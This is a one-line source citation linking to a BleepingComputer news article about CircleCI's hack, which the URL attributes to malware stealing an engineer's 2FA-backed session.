Source – https://www.bleepingcomputer.com/news/security/circlecis-hack-caused-by-malware-stealing-engineers-2fa-backed-session/